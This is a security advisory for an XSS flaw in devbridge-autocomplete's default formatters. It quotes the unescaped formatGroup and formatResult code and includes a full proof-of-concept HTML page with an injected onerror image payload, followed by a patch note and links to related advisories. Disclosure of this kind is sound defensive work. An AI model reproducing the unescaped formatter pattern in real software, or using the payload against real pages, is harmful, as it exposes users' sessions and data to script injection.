Summary
devbridge-autocomplete has XSS in its default formatters: formatGroup and formatResult fail to escape HTML in untrusted inputs
Advisory details
Summary
The default formatGroup and formatResult functions in devbridge-autocomplete concatenate values into HTML without escaping, allowing XSS when an attacker controls (or can taint) the suggestion data source.
Details
1. formatGroup — category is interpolated raw.
src/format.ts:
function formatGroup(suggestion, category) {
return '<div class="autocomplete-group">' + category + '</div>';
}
If groupBy is used and the grouping field of any suggestion contains HTML, that HTML is executed.
2. formatResult — early-return branch returns suggestion.value raw.
src/format.ts:
function formatResult(suggestion, currentValue) {
if (!currentValue) {
return suggestion.value; // un-escaped
}
/* ... non-empty path escapes correctly ... */
}
The early-return branch is reached when suggest() renders with an empty currentValue, which happens with minChars: 0 and a server that returns suggestions for an empty query. The returned string is concatenated into the container's innerHTML.
PoC (formatGroup)
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>PoC: formatGroup XSS in jQuery-Autocomplete v2.0.0</title>
</head>
<body>
<input id="ac" type="text" placeholder="Type 'a' to trigger" autocomplete="off">
<script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
<script src="dist/jquery.autocomplete.js"></script>
<script>
var poisoned = [
{ value: 'Apple', data: { category: "<img src=x onerror=\"alert('XSS via formatGroup')\">" } },
{ value: 'Avocado', data: { category: 'Safe Group' } }
];
$('#ac').devbridgeAutocomplete({
lookup: poisoned,
groupBy: 'category',
minChars: 1
});
</script>
</body>
</html>
Originally identified by an earlier human analysis; the PoC above was produced with the assistance of Claude Opus 4.7.
Impact
XSS in pages that render attacker-controllable suggestion data. The actual impact depends on what the embedding page has access to (cookies, session tokens, DOM), per standard reflected/stored XSS.
Patch
Both formatters now run their interpolated input through the browser's text-node escaping (createElement + textContent) before producing the HTML string. Fixed in version 2.0.1.
References
Related vulnerabilities
All Supply chain →- HIGHCVE-2026-52798
Gogs has Stored XSS in `.ipynb` Preview
- CRITICALCVE-2026-44203
OpenAM has pre-auth Reflected XSS in OAuth2 / OIDC response_mode=form_post via state parameter (FormPostResponse.ftl)
- HIGHGHSA-x975-rgx4-5fh4
appium-mcp: Unescaped Locator Data XSS in MCP-UI Resource (createLocatorGeneratorUI)
- MEDIUMCVE-2026-55877
symfony/ux-icons: XSS via unsanitized SVG content in local files and Iconify on-demand responses
- HIGHCVE-2026-55692
StarCitizenWiki Extension Embed Video: Stored XSS via malformed src url with $wgEmbedVideoRequireConsent enabled
- MEDIUMCVE-2026-55650
Outerbase Studio: Stored XSS in Text Widget Leads to Authentication Token Exposure